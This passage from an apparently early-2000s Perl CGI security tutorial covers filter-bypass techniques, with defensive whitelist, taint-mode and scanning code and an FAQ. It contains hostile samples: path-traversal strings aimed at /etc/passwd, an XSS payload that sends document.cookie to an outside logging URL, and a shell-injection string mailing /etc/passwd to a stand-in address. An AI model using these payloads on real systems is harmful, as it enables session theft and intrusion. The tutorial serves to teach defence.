This will pass the first two filters again.  It will be affected by the last one: the regex makes a single pass and never rescans what it has already stepped over, so each .../ loses its inner ../ and leaves a lone . behind, and each ...// leaves ./ behind.  The pieces join up into ../../etc/passwd.  Exactly what the attacker wanted it to be.  This one is also very common, and even many security aware perl programmers make input filtering mistakes like it.  I've seen multiple suggested fixes for scripts posted to bugtraq which are still vuln because they contain poor filtering.

This type of filtering problem, where the filters help create the dangerous string, is often used for ../ and XSS attacks, but it can be exploited for just about anything.  Always make sure your filters aren't turning the string into something dangerous.
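If you want to watch the filters build the exploit, here is a short test harness.  It runs the two attack strings from above (and one honest filename) through the four substitutions, and next to that through an allow-only-what-is-clean check.  The sub names and the exact whitelist pattern are my own picks for this sketch, not taken from any real script.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# The "remove what looks bad" filters from the example above.
sub blacklist_filter {
    my ($name) = @_;
    $name =~ s/\\\///g;     # filters \/
    $name =~ s/\\\.//g;     # filters \.
    $name =~ s/\.\.\///g;   # filters ../
    $name =~ s/\|//g;       # filters |
    return $name;
}

# Allow-only check: word characters and dashes, separated by single dots.
sub whitelist_ok {
    my ($name) = @_;
    return $name =~ /\A[\w\-]+(?:\.[\w\-]+)*\z/ ? 1 : 0;
}

for my $input ('.|./.|./etc/passwd', '.../...//.../...//etc/passwd', 'report.txt') {
    printf "%-30s filtered to %-18s whitelist says %s\n",
        $input,
        blacklist_filter($input),
        whitelist_ok($input) ? 'accept' : 'reject';
}
```

Both attack strings come out of blacklist_filter() as ../../etc/passwd, while the whitelist rejects them without trying to repair anything.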

Another common mistake in filtering is forgetting that multiple matches can be found within one variable.  Let me show you an example from a fix to a message board script which was supposed to stop javascript in the <img> tag.  The board converts [img] into <img>
	if ($message =~ /\[img\]http:\/\/.*\[\/img\]/) {
$message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg;
if($message =~ m~\[img\]\n?(.+?)\n?\[/img\]~gi && $1 !~ m~javascript\:~gi) {
$message =~ s~\[img\]\n?(.+?)\n?\[/img\]~<img src="$1">~isg;
}
}
else{
die "img tag's src needs to start with http://";
}

First off, this is vuln to html encoding, where something like javas&#67;ript gets past the filters for 'javascript' and will still get interpreted by the browser as javascript.  Most javascript filters do not stop this, and almost all can be evaded for XSS.  But there is another problem with the design of this filter.  As I mentioned before in the section about the SSI filtering problem, it comes down to how perl matches: once it finds the first part of a match it keeps going until it finds the rest, and it never rescans text it has already matched.  So in this case $message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg; would find the first [img]javascript: and then run forward to the first [/img] after it.  Everything found in between is put back into $message through $1 without being checked again.  That "everything" could contain another [img]javascript: string, which is then left intact to be turned into html by the later substitution.  Take this example:
	#line breaks added so lower resolutions don't have to scroll sideways
#sorry 800x600 and lower, you still get it.
$message = "[img]http://a[/img][img]javascript:[img]javascript:
document.write('<img src=http://b0iler.eyeonsecurity.net/log.cgi?cookie='+escape(document.cookie)+'>');
var nothing='[/img]';[/img]";

[then the filters]

This would match from the first [img]javascript: to the first [/img], break up only that outer pair, and leave the inner [img]javascript: free to pair up with the last [/img].  Instead of trying to explain exactly what is happening try running this script:
	#!/usr/bin/perl
$message = "[img]http://a[/img][img]javascript:[img]javascript:
document.write('<img src=http://b0iler.eyeonsecurity.net/log.cgi?cookie='+escape(document.cookie)+'>');
var nothing='[/img]';[/img]";

print "0: $message\n\n";
if ($message =~ /\[img\]http:\/\/.*\[\/img\]/) {
print "1: $message\n\n";
$message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg;
print "2: $message\n\n";
if($message =~ m~\[img\]\n?(.+?)\n?\[/img\]~gi && $1 !~ m~javascript\:~gi) {
$message =~ s~\[img\]\n?(.+?)\n?\[/img\]~<img src="$1">~isg;
print "3: $1\n\n";
}
}
print "5: $message\n\n";
exit;

As you can see, 3 is the one which is totally unfiltered for javascript and has its [img] converted to <img>.  This filtering problem is not as widespread as the "filters affecting filters" one, but I've seen it a half dozen times.  The key to security is imagining all the possible ways an attacker can do things, and then thinking about whether they threaten security at all.  Since it is hard to be certain that no such ways exist, there are many security holes in well tested scripts whose authors had security in mind when coding.  Another good rule of thumb is to deny anything that could be dangerous; do not try to correct it.  If this script had just done something like:  if($message =~ /javascript/i){ die "no javascript allowed"; }  then it would have prevented this particular problem (though not the html encoding trick mentioned above).
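As a sketch of "deny, do not correct" applied to the [img] tag, the sub below checks every [img]...[/img] pair against a strict URL pattern and refuses the whole message if any of them fails.  The sub name and the allowed character set are assumptions of mine (the set is deliberately stingy and will turn away some legitimate URLs), so treat it as a starting point and not as the board's real fix.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Returns the converted message, or undef if any [img] tag looks wrong.
sub render_img_tags {
    my ($message) = @_;

    # Pass 1: inspect every [img]...[/img] pair, not just the first one.
    while ($message =~ m{\[img\](.*?)\[/img\]}gis) {
        my $url = $1;
        # Plain http(s) URLs only: no quotes, brackets, spaces or entities.
        return undef unless $url =~ m{\Ahttps?://[\w\-./~%?=+:]+\z}i;
    }

    # Pass 2: convert.  Every body has been checked by now.
    $message =~ s{\[img\](.*?)\[/img\]}{<img src="$1">}gis;

    # Any tag still left over was unbalanced, so deny that too.
    return undef if $message =~ m{\[/?img\]}i;

    return $message;
}

my $attack = "[img]http://a[/img][img]javascript:[img]javascript:alert(1);var nothing='[/img]';[/img]";
my $honest = "look: [img]http://example.com/cat.png[/img]";

for my $message ($attack, $honest) {
    my $html = render_img_tags($message);
    print defined $html ? "accepted: $html\n" : "rejected\n";
}
```

Because the check and the conversion use the same pattern, there is no gap between what was inspected and what gets turned into html.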

The only other thing I really look for in the filtering of input is whether the programmer forgot to filter a metacharacter.  It is usually \ or | which gets left out.  The \ can cause problems because it can be used to escape the '\' that a filter adds when it just escapes other metacharacters.  The | can be used both to exploit a poorly called open() and as a pipe in a shell command.  Many programmers will filter with $command =~ s/;//g; but will forget the |, &, &&, and the file input and output operators: >> > and < <<.
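A quick way to convince yourself (or a coworker) that stripping ; is not enough is to list what survives the filter.  The metacharacter list below is only a partial one picked for the demonstration, and the input string is made up.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Some of the characters a shell treats specially (not a complete list).
my @shell_meta = (';', '|', '&', '<', '>', '`', '$', '\\', "\n");

# The incomplete filter from the text: only ; is removed.
sub strip_semicolons {
    my ($input) = @_;
    $input =~ s/;//g;
    return $input;
}

# Report which metacharacters are still present in a string.
sub leftover_meta {
    my ($input) = @_;
    return grep { index($input, $_) >= 0 } @shell_meta;
}

my $input    = 'report.txt; cat /etc/passwd | mail attacker@example.com';
my $filtered = strip_semicolons($input);

print "after filtering: $filtered\n";
print "still dangerous: ", join(' ', leftover_meta($filtered)), "\n";
```

The pipe is still there after filtering, and so is everything the attacker typed after it.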

The final problem I will go over in filtering is simply forgetting things.  Sometimes a programmer will filter bad strings in input variables, but forget to check uppercase as well as lowercase.  For instance, I've seen things like this a few times:
	if($FORM{'file'} =~ /\.cgi$/){
&errorhtml('you submitted an invalid file type');
}

This might look good at first glance, and the programmer might never think twice about it.  But sending script.CGI will allow you to specify CGI files.  Although this tutorial is based more towards *nix systems, this problem mostly affects windows.  This is because windows filenames are case insensitive, so script.CGI is the same file as script.cgi.  On *nix these are two different files.  Adding the i modifier (/\.cgi$/i) closes this hole.

Other things include forgotten metacharacters, like the forgotten '\' in the regex I mentioned in the Reverse Directory Transversal section, or forgetting that script.cgi\0 will open the script.cgi file.
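Both of these "forgotten things" can be caught by a check only a few lines long.  This is a sketch with a made-up sub name; it only knows about the .cgi extension from the example above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Returns 1 if the submitted filename should be refused.
sub is_blocked_file {
    my ($file) = @_;
    return 1 if $file =~ /\0/;          # null byte anywhere: always deny
    return 1 if $file =~ /\.cgi\z/i;    # .cgi, .CGI, .Cgi and so on
    return 0;
}

for my $name ('script.cgi', 'script.CGI', "script.cgi\0.txt", 'notes.txt') {
    (my $shown = $name) =~ s/\0/\\0/g;  # make the null byte visible when printing
    printf "%-18s %s\n", $shown, is_blocked_file($name) ? 'blocked' : 'allowed';
}
```

Only notes.txt gets through.  A whitelist of allowed extensions would be stronger still than blocking one known bad extension.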



Examples Of Vulnerable Scripts


          This section of the tutorial is majorly lacking, this is mostly due to my focus on the rest of the tutorial.  Also the fact that it is just plain more fun to talk about all the holes I found rather than going through even more code and writing my own.  perlaudit.pl isn't much of a script as of yet since it has failed to grab my interest and I lost many of the common CGI exploit project scripts I coded.  I might update this section with more info if I complete these tasks..  or I might just remove it and move on to something more entertaining.



Common CGI Exploit Project
          I proposed this idea to a few security newbies on IRC one day and they seemed to want it done really badly.  The idea was to make perl scripts which they can exploit, both to see how CGI exploits work and to learn a little about them.  So after a little work I have set up a few examples of how to exploit perl scripts.  They are just interactive examples used to teach people about the most common holes in scripts on webpages.  I made them so that they require very little knowledge to do; almost everyone should be able to exploit them.  You can find the scripts online on my site at http://b0iler.eyeonsecurity.net in the tutorials section under the "Common CGI Exploit Project" link.  I would suggest knowing a little bit of perl or php before trying these..  although you can still do them without any, and you might learn a bit from them.  Don't worry about damaging my site, the scripts aren't really exploitable.  I made them so that they check for a possible exploit; if you get it then it will display information just like you really did exploit it, but in reality you didn't.  Also the source code to the vulnerable version of the scripts is available on the site.  I hope to add more and more examples over time, but I am lazy so don't count on it.  I hope you have some fun learning about exploiting =)

I also coded up a small perl script to help find possible vulns in CGI scripts.  It will check every perl file in a directory for commonly exploitable function calls and then will ask if you want to see where the variables that influence that function came from.  Then it asks if you want to see all filters put on this variable.  The script is very beta and will only help find the easiest to spot vulnerabilities.  It will not automate the process completely; you must still know what to look for in order to find vulns with it.  It just sorts things out to make the process go faster.  You can get this script when it's finished at http://b0iler.eyeonsecurity.net in the tutorials section right under the link to this tutorial.  It will be called perlaudit.pl.  Also there will be a zip/tarball of all the scripts so you can download them and test on your local server.



Real Life Examples
          Ok, so far everything has been made up scenarios.  In RFP's paper he went through some real world examples of what he was talking about.  I found this helpful and it really brought home the points he was trying to make.  So I will do the same and show you a few scripts that I found with vulnerabilities I have talked about.  I am sorry, but for now this section does not exist, because I haven't had time to find scripts with good examples of the problems I talked about.  Maybe I'll go through bugtraq one week and dig up some good ones to talk about.  Until then just reread the paper to better understand something =)



Perlaudit.pl
          This is a short script which I wrote one day, although in its current state it won't do much more than egrep "open|system|\`|exec|eval".  I would like to call on others to help me improve this script to help find common vulnerabilities in perl scripts.  It is basically an egrep with some helpful options, like seeing where variables are defined (helps to see if they are set by user input or hard coded) and seeing if you can evade the filters on these variables, like the kind described throughout this paper.
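To be clear, the following is not perlaudit.pl.  It is only a rough sketch of the egrep-style starting point described above, written in perl so it can grow options later.  The sub name, the output format and the choice to skip comment lines are all my own assumptions for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# The calls worth a second look (same list as the egrep, plus unlink).
my $risky = qr/\b(?:open|system|exec|eval|unlink)\b|`/;

# Return "name:line: code" for every line that uses one of them.
sub scan_lines {
    my ($name, @lines) = @_;
    my @hits;
    my $number = 0;
    for my $line (@lines) {
        $number++;
        next if $line =~ /^\s*#/;    # skip lines that are only a comment
        push @hits, "$name:$number: $line" if $line =~ $risky;
    }
    return @hits;
}

# Usage: perl scan.pl *.cgi
for my $file (@ARGV) {
    my $fh;
    unless (open($fh, '<', $file)) {
        warn "skipping $file: $!\n";
        next;
    }
    my @lines = <$fh>;
    close($fh);
    chomp @lines;
    print "$_\n" for scan_lines($file, @lines);
}
```

Each hit is only a place to start reading.  You still have to trace where the variables in that call come from and what filters they pass through.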

You can get perlaudit at my website: http://b0iler.eyeonsecurity.net in the tutorials section there will be a link to it right under the link to this tutorial.  I'd like to hear some comments on this script and hopefully ideas on how to improve it, since in its current state it isn't very useful at all.  If you have the time and skill feel free to add your own functions that help find holes or improve how the script works.  If this script gets advanced it could easily find almost every common vulnerability and check if it is exploitable with GET, POST, or COOKIE (and some ENV) variables.  It would be very helpful to people searching for vulnerabilities and for programmers who don't know a great deal about security.

I'd also like to hear about any other perl auditing code out there.  If there is already a great script to do this I will try it out and report on it.  My email address is at the end of this paper, but for lazy people it's b0iler@hotmail.com.  I would really love to hear from a few people on this, especially anyone with some real coding skills who wants to help.

As of 5-1-02 perlaudit is not even close to being released.

Conclusion


          My purpose in writing this paper was to help friends out with finding security flaws in CGI scripts.  But as side goals I wanted to introduce a few new techniques I've found to the world of exploiting CGIs and create an easy to understand, yet detailed paper on all the common problems.  It seemed like the net was missing this.  I hope someone learned something new, or understands something better now; if so my purpose was fulfilled.

          Perl was not designed with the net in mind.  It does have a few security benefits over shell scripts and other basic languages, but for the most part it is up to the author of the script to know what is dangerous and how to handle it.  Perl provides an almost unlimited amount of power; one mistake and you are letting anyone execute commands on your system..  anonymously.  Now that you know the basics of how attackers abuse CGIs you can help secure your own or others.  I would recommend reading a bit more about perl/web security if you are serious about this, I just covered the basics lightly.  There is plenty of in-depth documentation about perl on the net, but it also takes some experience through trial and error to become fully comfortable coding CGIs with perl.

I was originally planning on making this paper a lot longer, including both how to exploit vulnerabilities and how to prevent them from happening.  After I wrote a few paragraphs about securing your perl scripts a friend said it was boring and suggested just pointing the readers to a few good sources on perl security.  It seems to me like that's a good idea.  I'll just use a few quotes from the camel to tempt you into reading about perl security.  The basics begin at Taint mode, and it doesn't get much more complicated than that.  Even if you use perl's built in safety that doesn't mean you are secure; one bad attempt at filtering user input to make it safe can lead to a major vulnerability.  Take some of larry's advice and only allow what is safe, deny the rest.

          "Programs that can be run remotely and anonymously by anyone on the Net are executing in the most hostile of environments.  You should not be afraid to say "No!" occasionally."

Now to scare you all into actually learning about taint mode here's some more insight from Mr Wall himself.

          "On the more security-conscious sites, running all CGI scripts under the -T flag isn't just a good idea: it's the law."

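For a first taste of what taint mode asks of you, here is a minimal sketch of untainting a filename.  Under perl -T anything that comes from outside (like $ENV{'QUERY_STRING'}) is marked tainted and cannot be used in open(), system() and friends until it has been pulled out through a regex capture.  The sub name and the pattern are my own picks; the script also runs without -T, in which case nothing is ever marked tainted.

```perl
#!/usr/bin/perl
# Run as: perl -T thisscript.pl   (it also runs without -T)
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Return a clean copy of the filename, or undef if it is not acceptable.
sub untaint_filename {
    my ($raw) = @_;
    return undef unless defined $raw;
    # Only a successful capture gives back untainted data.
    if ($raw =~ /\A([\w\-]+(?:\.[\w\-]+)*)\z/) {
        return $1;
    }
    return undef;
}

my $raw  = defined $ENV{'QUERY_STRING'} ? $ENV{'QUERY_STRING'} : '';
my $file = untaint_filename($raw);

print "input is ", (tainted($raw) ? "tainted" : "not tainted"), "\n";
print defined $file ? "ok to use: $file\n" : "rejected\n";
```

Notice that taint mode only forces you to write a pattern.  It cannot tell whether the pattern is any good, which is why a capture of (.*) untaints everything and protects nothing.
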
There, my job is done.  If you need to contact me try emailing me at b0iler@hotmail.com or on irc at a ton of different channels.  EFnet (#vuln), undernet, dalnet, etc..  as b0ils, b0iler, b0iled, or b0ilmatic.  If all else fails try the message boards at blacksun.box.sk



FAQ

1  Question:  "I don't know perl and your tutorial is too hard to understand, can you write a section on perl?"

     Answer:  No, there are already tons of great perl tutorials, and it would take me a year to write a tutorial on perl.  This tutorial is meant for people who already know perl and wish to learn about more advanced ways of finding/preventing vulnerabilities in CGIs.

2  Question:  "How Do I $something ?"

     Answer:  Read the tutorial


3  Question:  "What if I didn't understand $something ?"

     Answer:  If you don't understand a part of this tutorial go learn more perl/unix =)


4  Question:  "I know perl, but I still didn't understand $something ?"

     Answer:  Try rereading the paper; if that still doesn't work check out other papers on perl security and do a little testing yourself.


5  Question:  "What's the best way to find holes in scripts?"

     Answer:  By looking at the code, thinking laterally, and setting up a test server to try things on.


6  Question:  "Is there any secret to finding holes in scripts?"

     Answer:  egrep "open|system|exec|\`|eval|unlink" *.cgi or use my perlaudit.pl script.


7  Question:  "If it is so easy to exploit CGI scripts why doesn't everyone do it?"

     Answer:  Many people do exploit them..  but some people find it extremely boring and time consuming to go through all that code.  A lot of exploits go unreported and are kept underground or are fixed in newer versions of the script.


8  Question:  "Haven't most of the vulnerabilities in CGI scripts been exploited already?"

     Answer:  Perl has been around since 1987 and CGI scripts have been used on the net for a long time, but there are still new scripts being coded every day, and of course there are older scripts with vulnerabilities in them that haven't been exploited yet.


9  Question:  "Why learn how to exploit perl when PHP is getting so popular?"

     Answer:  By learning how to exploit perl CGI scripts you will be able to learn how to exploit PHP in no time :) And there isn't nearly as much documentation on common vulnerabilities in PHP scripts as there is for Perl.  There are some well known hot spots that provide possible exploitation..  I will cover these in another tutorial.  It shouldn't be too long after this one that I release one on PHP security.


10 Question:  "What can I do if I don't have the source to a script?"

      Answer:  Try making educated guesses as to what could make the script vulnerable.  You can also try to find an exploit in another script (or that script) which will allow you to view the source of files.


11 Question:  "Is exploiting CGI hard?"

      Answer:  yes and no.  Finding an exploit in 1000 scripts is easy, just look for bad open and system calls.  But design flaws can take a lot longer and can require hours of testing.  You need to understand what the script is doing to find design flaws, this takes a lot of concentration and perl knowledge.


12 Question:  "I heard "homemade" CGI scripts are more vulnerable to being hacked than distributed"

      Answer:  Many people claim this, but I find it false.  The basis of this argument is that distributed scripts are made by "professionals", which may be true..  but most still have very little knowledge of perl security (even a lot of "security experts" program vulnerable scripts).  The other claim is that full disclosure helps to find all the holes and patch them quickly.  This is true, but it is hard to stay ahead of the attackers once an exploit is published.

I find many holes in publicly distributed scripts, and I also find plenty of holes in homemade scripts, but when an attacker is going to exploit a script it helps a lot to have the source.  Most "hackers" don't have the knowledge of all the possible things to try to exploit scripts; in fact most just wait for exploits to be handed to them on bugtraq.  Security through obscurity may not be great, but in a world of script kiddies it can be a good thing.  Try not to let anyone know what scripts you are running by renaming them and their directories.  But still keep on top of the latest security news and audit your scripts by hand.  Bottom line, both homemade and publicly available scripts contain holes.  I wouldn't say either is more secure.


13 Question:  "I read that perl has race conditions, why didn't you mention this?"

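      Answer:  As far as I know, the race conditions people usually mean were in perl itself and have been fixed in the latest releases.  A script can still create its own, for example by checking a file and then opening it in two separate steps, but that is beyond the basics covered here.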


14 Question:  "Is reading files really that important a security concern?"

      Answer:  Yes, on many systems there is some kind of further access which can be gained once file reading is available to the attacker.  Files such as .htaccess, .htpasswd, and other configuration/password files can provide access to parts of the site which should be off limits.  Reading a script's source can also allow the attacker to find further vulnerabilities which could allow things like writing to files or command execution.


15 Question:  "Is writing to files really that important a security concern?"

      Answer:  Writing to .htaccess files or other configuration files and scripts can allow an attacker more access and privileges than they were meant to have.  Many options are available to attackers to turn their file writing privilege into further access such as command execution.  This is mostly done by writing scripts which will issue commands for them.


16 Question:  "Is CGI security really that big a deal?"

      Answer:  There are many situations when everything on the system is secure from remote access, but a CGI script allows attackers to issue commands.  This can be used to gain further access by exploiting a local problem in the system.  According to the SANS top 10 list, "The Ten Most Critical Internet Security Threats", CGI vulnerabilities are the number 2 biggest problem in internet security.  Then in the top 20 list released 10 months later CGI security was still rated among the top security concerns on the net.  While most of the old problems were solved and disappeared from the list, CGI problems still remained strong.  This is not just a problem we will see for the next few months; CGI security is a major issue for the net.


17 Question:  "Is taint mode that important?"

      Answer:  Yes, it is mandatory to learn about it if you are going to code CGI.


18 Question:  "If I know a new/different technique to exploit/find vulns in perl scripts what should I do?"

      Answer:  I'd be glad to hear about any different ways, if it is incredibly new then maybe post to bugtraq or write a paper about it.


19 Question:  "Why did you write this?"

      Answer:  I know that there are already a few papers covering perl security and common perl vulnerabilities, but I knew a few new tricks and found most of the other papers hard to understand with poor examples.  I also had a lot of friends who wanted to learn how to exploit scripts once they saw how fast I could find holes in theirs.  So after a few dozen emails asking questions about perl exploitation I decided just to write a tutorial and point people there instead.


20 Question:  "I would like to offer you money to work for my company as a perl coder or script auditor, will you do it?"

      Answer:  Yes, I have no job and desperately need one.  I think I am pretty damn good at auditing scripts, and I can code in both php and perl securely.  Email b0iler@hotmail.com and give me the details.



Sources

          Jordan Dimov's article in phreedom zine - Security Issues in Perl Scripts
          rain.forest.puppy's article in phrack zine - Perl CGI problems
          Larry Wall, Tom Christiansen & Jon Orwant's book - Programming Perl
          Various testing by myself
          Sublime's song on second hand smoke - Had A Dat


[-----]

http://b0iler.eyeonsecurity.net/   - is my homepage (just moved there, thanks obscure).

I got tons of tutorials, mini-tutorials, advisories, and code written by me there.  Come check out what I'm up to and possibly learn a bit.  Also check out eyeonsecurity.net for obscure's interesting advisories and tutorials.  You'll love it.  I would like to give thanks to obscure for providing feedback which helped me improve this paper and to Cyrus for not eating it.  This tutorial was originally written for http://blacksun.box.sk but anyone has permission to mirror it as long as it is mirrored in whole and proper credit is given to the author.  Also a link to http://b0iler.eyeonsecurity.net would be nice.

[-----]

"When your living life like a show you gotta take a bow to the people you know."